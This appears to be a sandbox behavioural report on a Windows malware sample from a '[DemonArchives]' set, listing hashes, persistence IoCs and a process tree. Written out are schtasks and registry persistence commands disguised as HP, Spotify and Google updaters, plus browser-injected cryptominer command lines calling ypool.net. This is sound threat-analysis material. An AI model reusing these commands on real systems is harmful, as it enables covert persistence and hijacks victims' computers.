Overview
overview
10Static
static
10[DemonArch...f3.exe
windows7-x64
10[DemonArch...5e.exe
windows7-x64
10[DemonArch...a8.exe
windows7-x64
10[DemonArch...55.exe
windows7-x64
[DemonArch...9c.exe
windows7-x64
8[DemonArch...ac.exe
windows7-x64
10[DemonArch...0f.exe
windows7-x64
10[DemonArch...94.exe
windows7-x64
10[DemonArch...7e.exe
windows7-x64
8[DemonArch...5a.exe
windows7-x64
1[DemonArch...c4.exe
windows7-x64
[DemonArch...f3.exe
windows7-x64
10[DemonArch...8f.exe
windows7-x64
10[DemonArch...85.exe
windows7-x64
10[DemonArch...92.exe
windows7-x64
9[DemonArch...5b.exe
windows7-x64
10[DemonArch...59.exe
windows7-x64
7[DemonArch...0f.exe
windows7-x64
10[DemonArch...61.exe
windows7-x64
10[DemonArch...16.exe
windows7-x64
10[DemonArch...23.exe
windows7-x64
[DemonArch...6d.exe
windows7-x64
10[DemonArch...af.exe
windows7-x64
10[DemonArch...5c.exe
windows7-x64
10[DemonArch...52.exe
windows7-x64
10[DemonArch...af.exe
windows7-x64
10[DemonArch...fa.exe
windows7-x64
10[DemonArch...f1.exe
windows7-x64
7[DemonArch...7b.exe
windows7-x64
10[DemonArch...02.exe
windows7-x64
10[DemonArch...80.exe
windows7-x64
[DemonArch...c8.exe
windows7-x64
8Analysis
-
max time kernel
297s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
04-07-2024 17:22
Behavioral task
behavioral1
Sample
[DemonArchives]01be7be288126004a6b6013cfa9630f3.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
[DemonArchives]02352cbf001e9c8176a5b7d381ef9b5e.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
[DemonArchives]02fa60c2391dc09e9a0b748a9d89c6a8.exe
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
[DemonArchives]04a8e202d70a574213680cdb7c82fb55.exe
Resource
win7-20240508-en
Behavioral task
behavioral5
Sample
[DemonArchives]05e82b287218043df6c8560cd0e2719c.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
[DemonArchives]07fe5f7c673e5faa200611f9cb716aac.exe
Resource
win7-20240508-en
Behavioral task
behavioral7
Sample
[DemonArchives]086b605fada00eaa39fca0581712f10f.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
[DemonArchives]09f326448c37d99a61bb064e68ac6b94.exe
Resource
win7-20240611-en
Behavioral task
behavioral9
Sample
[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe
Resource
win7-20240508-en
Behavioral task
behavioral10
Sample
[DemonArchives]0d061414e840b27ea6109e573bd2165a.exe
Resource
win7-20240419-en
Behavioral task
behavioral11
Sample
[DemonArchives]1192a915b81f1f7878472391f42cb6c4.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
[DemonArchives]14049d0a3afad0faa21ab1fff2e417f3.exe
Resource
win7-20240220-en
Behavioral task
behavioral13
Sample
[DemonArchives]149dd5469233f52aa4287362ce85b88f.exe
Resource
win7-20240611-en
Behavioral task
behavioral14
Sample
[DemonArchives]1df7772347bfd34ecb1685a1ba69c285.exe
Resource
win7-20240611-en
Behavioral task
behavioral15
Sample
[DemonArchives]1e0dc068677f96c9da7f43cf4d4acd92.exe
Resource
win7-20240508-en
Behavioral task
behavioral16
Sample
[DemonArchives]1ee7f65b0c08c4ff7e1047c14851575b.exe
Resource
win7-20240508-en
Behavioral task
behavioral17
Sample
[DemonArchives]1fa9dbcc19fb2ae5cd344f559e95b759.exe
Resource
win7-20240220-en
Behavioral task
behavioral18
Sample
[DemonArchives]227f3ff19943a0e8c1b26a563246280f.exe
Resource
win7-20240419-en
Behavioral task
behavioral19
Sample
[DemonArchives]2353c3f467be78e36e934caf5f3c3b61.exe
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
[DemonArchives]26add802e0e75416385317658b116216.exe
Resource
win7-20231129-en
Behavioral task
behavioral21
Sample
[DemonArchives]2bf9e607accd325cfb734cd594b00723.exe
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
[DemonArchives]3825817f6028f26ff0b5cd748559286d.exe
Resource
win7-20240611-en
Behavioral task
behavioral23
Sample
[DemonArchives]3e70eabf850c2134ac1acd815a2a90af.exe
Resource
win7-20240508-en
Behavioral task
behavioral24
Sample
[DemonArchives]41637d74a16e50cafe6cb72974a1cf5c.exe
Resource
win7-20240611-en
Behavioral task
behavioral25
Sample
[DemonArchives]42971155e95ad8ace7b6fc53d70fb952.exe
Resource
win7-20240508-en
Behavioral task
behavioral26
Sample
[DemonArchives]47522f57257b441811cf5f87c9118faf.exe
Resource
win7-20240611-en
Behavioral task
behavioral27
Sample
[DemonArchives]4782545d269557614be88caef0383cfa.exe
Resource
win7-20240419-en
Behavioral task
behavioral28
Sample
[DemonArchives]4bed82d2182d95951a4dd3b090868cf1.exe
Resource
win7-20240221-en
Behavioral task
behavioral29
Sample
[DemonArchives]4c1ca9436c971190f7082f5c108a007b.exe
Resource
win7-20240220-en
Behavioral task
behavioral30
Sample
[DemonArchives]4fd60e9aed5ab9ed5326da37806b2502.exe
Resource
win7-20240508-en
Behavioral task
behavioral31
Sample
[DemonArchives]550ad0e50316dfca7c0bfd14f9060880.exe
Resource
win7-20231129-en
Behavioral task
behavioral32
Sample
[DemonArchives]55a0c8c7e6c8b2be4ebd164d43e746c8.exe
Resource
win7-20240221-en
General
-
Target
[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe
-
Size
2.1MB
-
MD5
0a47e2885329b83d82525cb438e57f7e
-
SHA1
29346b4b5fc87c307001673061149a0b87b56c5b
-
SHA256
5d5e1582ff73932226faa633ebe171284d7f8ceef6642862e118ff377bd41b78
-
SHA512
99dbf4cdb706849cafb7f30016ea0a3f9fff85b20e4813e92bad63d369d66231d59d7ca8220d361cf71baf1f22a2e67d09e442ee27627f30d80818d00cc6f595
-
SSDEEP
49152:JEVUcGNLJpVCsGltfDZXUeSIo40DfOgBqT8kbrb41YM3wWOOEh/nFb:JE3GNmltKX4Of9BqT8Ob41YZW8/nFb
Malware Config
Signatures
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify\StubPath = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Spotify.exe\"" plugin-container.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify\Version = "12,1,7601,6409" plugin-container.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify\Version = "12,1,7601,6561" plugin-container.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify ~0a47e288.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify\StubPath = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\Spotify.exe\"" ~0a47e288.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify\Version = "12,1,7601,2293" ~0a47e288.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Spotify plugin-container.exe -
Executes dropped EXE 3 IoCs
pid Process 3052 ~0a47e288.exe 3012 plugin-container.exe 1188 Process not Found -
Loads dropped DLL 4 IoCs
pid Process 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 3052 ~0a47e288.exe 2016 Process not Found 2700 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral9/memory/2168-0-0x0000000000400000-0x00000000004B3000-memory.dmp upx behavioral9/memory/2168-1-0x0000000000400000-0x00000000004B3000-memory.dmp upx behavioral9/memory/2168-15-0x0000000000400000-0x00000000004B3000-memory.dmp upx -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Spotify = "\"C:\\Program Files\\Java\\jdk1.7.0_80\\jre\\lib\\deploy\\Spotify.exe\"" plugin-container.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AppExtender = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\AppExtB.exe\"" plugin-container.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Update = "\"C:\\Program Files\\DVD Maker\\it-IT\\GoogleUpdate.exe\"" plugin-container.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HP Software Update = "\"C:\\Program Files\\Windows Photo Viewer\\HPWuSchd2.exe\"" ~0a47e288.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Spotify = "\"C:\\Program Files\\Java\\jdk1.7.0_80\\jre\\lib\\deploy\\Spotify.exe\"" ~0a47e288.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AppExtender = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\AppExtB.exe\"" ~0a47e288.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Update = "\"C:\\Program Files\\DVD Maker\\it-IT\\GoogleUpdate.exe\"" ~0a47e288.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HP Software Update = "\"C:\\Program Files\\Windows Photo Viewer\\HPWuSchd2.exe\"" plugin-container.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\p: plugin-container.exe File opened (read-only) \??\s: plugin-container.exe File opened (read-only) \??\a: plugin-container.exe File opened (read-only) \??\i: plugin-container.exe File opened (read-only) \??\q: plugin-container.exe File opened (read-only) \??\v: plugin-container.exe File opened (read-only) \??\w: plugin-container.exe File opened (read-only) \??\g: plugin-container.exe File opened (read-only) \??\m: plugin-container.exe File opened (read-only) \??\o: plugin-container.exe File opened (read-only) \??\r: plugin-container.exe File opened (read-only) \??\b: plugin-container.exe File opened (read-only) \??\l: plugin-container.exe File opened (read-only) \??\j: plugin-container.exe File opened (read-only) \??\k: plugin-container.exe File opened (read-only) \??\n: plugin-container.exe File opened (read-only) \??\t: plugin-container.exe File opened (read-only) \??\u: plugin-container.exe File opened (read-only) \??\x: plugin-container.exe File opened (read-only) \??\e: plugin-container.exe File opened (read-only) \??\h: plugin-container.exe File opened (read-only) \??\y: plugin-container.exe File opened (read-only) \??\z: plugin-container.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral9/memory/2168-1-0x0000000000400000-0x00000000004B3000-memory.dmp autoit_exe behavioral9/files/0x0036000000015ce2-11.dat autoit_exe behavioral9/memory/2168-15-0x0000000000400000-0x00000000004B3000-memory.dmp autoit_exe behavioral9/files/0x000e00000001227f-232.dat autoit_exe behavioral9/files/0x0037000000015cea-233.dat autoit_exe behavioral9/files/0x000700000001962c-236.dat autoit_exe behavioral9/files/0x0007000000019630-239.dat autoit_exe behavioral9/files/0x0007000000019634-242.dat autoit_exe behavioral9/files/0x00070000000196b9-245.dat autoit_exe behavioral9/files/0x00070000000196be-248.dat autoit_exe behavioral9/files/0x0007000000019707-251.dat autoit_exe -
Suspicious use of SetThreadContext 22 IoCs
description pid Process procid_target PID 3012 set thread context of 2812 3012 plugin-container.exe 64 PID 3012 set thread context of 2632 3012 plugin-container.exe 66 PID 3012 set thread context of 2232 3012 plugin-container.exe 68 PID 3012 set thread context of 2512 3012 plugin-container.exe 70 PID 3012 set thread context of 2976 3012 plugin-container.exe 72 PID 3012 set thread context of 1776 3012 plugin-container.exe 74 PID 3012 set thread context of 2856 3012 plugin-container.exe 76 PID 3012 set thread context of 1728 3012 plugin-container.exe 78 PID 3012 set thread context of 2016 3012 plugin-container.exe 80 PID 3012 set thread context of 1036 3012 plugin-container.exe 82 PID 3012 set thread context of 2428 3012 plugin-container.exe 84 PID 3012 set thread context of 1788 3012 plugin-container.exe 96 PID 3012 set thread context of 336 3012 plugin-container.exe 98 PID 3012 set thread context of 2664 3012 plugin-container.exe 100 PID 3012 set thread context of 2060 3012 plugin-container.exe 102 PID 3012 set thread context of 864 3012 plugin-container.exe 104 PID 3012 set thread context of 2288 3012 plugin-container.exe 106 PID 3012 set thread context of 2116 3012 plugin-container.exe 108 PID 3012 set thread context of 1936 3012 plugin-container.exe 110 PID 3012 set thread context of 484 3012 plugin-container.exe 112 PID 3012 set thread context of 580 3012 plugin-container.exe 114 PID 3012 set thread context of 2612 3012 plugin-container.exe 116 -
Drops file in Program Files directory 42 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe ~0a47e288.exe File opened for modification C:\Program Files\DVD Maker\it-IT\~pcutzww.tmp plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\~mjshapz.tmp plugin-container.exe File opened for modification C:\Program Files\DVD Maker\it-IT\~yoabcnd.tmp ~0a47e288.exe File created C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe ~0a47e288.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\~sytecdx.tmp ~0a47e288.exe File opened for modification C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe ~0a47e288.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\~eqoiylk.tmp ~0a47e288.exe File opened for modification C:\Program Files\Windows Photo Viewer\~yenbeik.tmp plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\~jkvwohv.tmp plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\~cqaadsy.tmp ~0a47e288.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe ~0a47e288.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe ~0a47e288.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\~lmndezw.tmp plugin-container.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\Spotify.exe ~0a47e288.exe File opened for modification C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe plugin-container.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe plugin-container.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\~nlaurbl.tmp plugin-container.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\~camzfqk.tmp ~0a47e288.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\Spotify.exe ~0a47e288.exe File opened for modification C:\Program Files\Windows Photo Viewer\~xxlpics.tmp ~0a47e288.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe plugin-container.exe File opened for modification C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\~tscxofa.tmp plugin-container.exe File opened for modification C:\Program Files\Windows Photo Viewer\~jkyjwxz.tmp plugin-container.exe File opened for modification C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe ~0a47e288.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe ~0a47e288.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe ~0a47e288.exe File created C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe plugin-container.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe plugin-container.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe plugin-container.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\Spotify.exe plugin-container.exe File created C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe ~0a47e288.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe ~0a47e288.exe File opened for modification C:\Program Files\DVD Maker\it-IT\~fvwrfkt.tmp plugin-container.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\~wtzjiyz.tmp plugin-container.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\Spotify.exe plugin-container.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\~azkqzwr.tmp plugin-container.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\~hzxivyw.tmp plugin-container.exe File created C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe plugin-container.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1076 schtasks.exe 2420 schtasks.exe 2640 schtasks.exe 2680 schtasks.exe 2584 schtasks.exe 1916 schtasks.exe 2124 schtasks.exe 1520 schtasks.exe 652 schtasks.exe 840 schtasks.exe 2012 schtasks.exe 3016 schtasks.exe 2052 schtasks.exe 2484 schtasks.exe 1496 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 3052 ~0a47e288.exe 3052 ~0a47e288.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe 3012 plugin-container.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2168 wrote to memory of 3052 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 28 PID 2168 wrote to memory of 3052 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 28 PID 2168 wrote to memory of 3052 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 28 PID 2168 wrote to memory of 3052 2168 [DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe 28 PID 3052 wrote to memory of 2792 3052 ~0a47e288.exe 29 PID 3052 wrote to memory of 2792 3052 ~0a47e288.exe 29 PID 3052 wrote to memory of 2792 3052 ~0a47e288.exe 29 PID 3052 wrote to memory of 1264 3052 ~0a47e288.exe 31 PID 3052 wrote to memory of 1264 3052 ~0a47e288.exe 31 PID 3052 wrote to memory of 1264 3052 ~0a47e288.exe 31 PID 3052 wrote to memory of 2752 3052 ~0a47e288.exe 33 PID 3052 wrote to memory of 2752 3052 ~0a47e288.exe 33 PID 3052 wrote to memory of 2752 3052 ~0a47e288.exe 33 PID 3052 wrote to memory of 2012 3052 ~0a47e288.exe 35 PID 3052 wrote to memory of 2012 3052 ~0a47e288.exe 35 PID 3052 wrote to memory of 2012 3052 ~0a47e288.exe 35 PID 3052 wrote to memory of 2584 3052 ~0a47e288.exe 37 PID 3052 wrote to memory of 2584 3052 ~0a47e288.exe 37 PID 3052 wrote to memory of 2584 3052 ~0a47e288.exe 37 PID 3052 wrote to memory of 1520 3052 ~0a47e288.exe 39 PID 3052 wrote to memory of 1520 3052 ~0a47e288.exe 39 PID 3052 wrote to memory of 1520 3052 ~0a47e288.exe 39 PID 3052 wrote to memory of 652 3052 ~0a47e288.exe 41 PID 3052 wrote to memory of 652 3052 ~0a47e288.exe 41 PID 3052 wrote to memory of 652 3052 ~0a47e288.exe 41 PID 3052 wrote to memory of 1076 3052 ~0a47e288.exe 43 PID 3052 wrote to memory of 1076 3052 ~0a47e288.exe 43 PID 3052 wrote to memory of 1076 3052 ~0a47e288.exe 43 PID 3052 wrote to memory of 3012 3052 ~0a47e288.exe 45 PID 3052 wrote to memory of 3012 3052 ~0a47e288.exe 45 PID 3052 wrote to memory of 3012 3052 ~0a47e288.exe 45 PID 3012 wrote to memory of 1148 3012 plugin-container.exe 46 PID 3012 wrote to memory of 1148 3012 plugin-container.exe 46 PID 3012 wrote to memory of 1148 3012 plugin-container.exe 46 PID 3012 wrote to memory of 2376 3012 plugin-container.exe 48 PID 3012 wrote to memory of 2376 3012 plugin-container.exe 48 PID 3012 wrote to memory of 2376 3012 plugin-container.exe 48 PID 3012 wrote to memory of 2156 3012 plugin-container.exe 50 PID 3012 wrote to memory of 2156 3012 plugin-container.exe 50 PID 3012 wrote to memory of 2156 3012 plugin-container.exe 50 PID 3012 wrote to memory of 3016 3012 plugin-container.exe 52 PID 3012 wrote to memory of 3016 3012 plugin-container.exe 52 PID 3012 wrote to memory of 3016 3012 plugin-container.exe 52 PID 3012 wrote to memory of 1916 3012 plugin-container.exe 56 PID 3012 wrote to memory of 1916 3012 plugin-container.exe 56 PID 3012 wrote to memory of 1916 3012 plugin-container.exe 56 PID 3012 wrote to memory of 2052 3012 plugin-container.exe 58 PID 3012 wrote to memory of 2052 3012 plugin-container.exe 58 PID 3012 wrote to memory of 2052 3012 plugin-container.exe 58 PID 3012 wrote to memory of 2484 3012 plugin-container.exe 60 PID 3012 wrote to memory of 2484 3012 plugin-container.exe 60 PID 3012 wrote to memory of 2484 3012 plugin-container.exe 60 PID 3012 wrote to memory of 2420 3012 plugin-container.exe 62 PID 3012 wrote to memory of 2420 3012 plugin-container.exe 62 PID 3012 wrote to memory of 2420 3012 plugin-container.exe 62 PID 3012 wrote to memory of 2812 3012 plugin-container.exe 64 PID 3012 wrote to memory of 2812 3012 plugin-container.exe 64 PID 3012 wrote to memory of 2812 3012 plugin-container.exe 64 PID 3012 wrote to memory of 2812 3012 plugin-container.exe 64 PID 3012 wrote to memory of 2812 3012 plugin-container.exe 64 PID 3012 wrote to memory of 2632 3012 plugin-container.exe 66 PID 3012 wrote to memory of 2632 3012 plugin-container.exe 66 PID 3012 wrote to memory of 2632 3012 plugin-container.exe 66 PID 3012 wrote to memory of 2632 3012 plugin-container.exe 66 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe"C:\Users\Admin\AppData\Local\Temp\[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Users\Admin\AppData\Local\Temp\~0a47e288.exe"C:\Users\Admin\AppData\Local\Temp\~0a47e288.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵PID:2792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵PID:1264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵PID:2752
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "HP Software Update" /TR "\"C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
PID:2012
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "Spotify" /TR "\"C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
PID:2584
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 35 /TN "AppExtender" /TR "\"C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
PID:1520
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 32 /TN "Google Update" /TR "\"C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
PID:652
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Comm Driver" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
PID:1076
-
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeC:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe3⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵PID:1148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵PID:2376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵PID:2156
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 11 /TN "HP Software Update" /TR "\"C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:3016
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 8 /TN "Spotify" /TR "\"C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:1916
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "AppExtender" /TR "\"C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:2052
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "Google Update" /TR "\"C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Comm Driver" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:2420
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2512
-
-
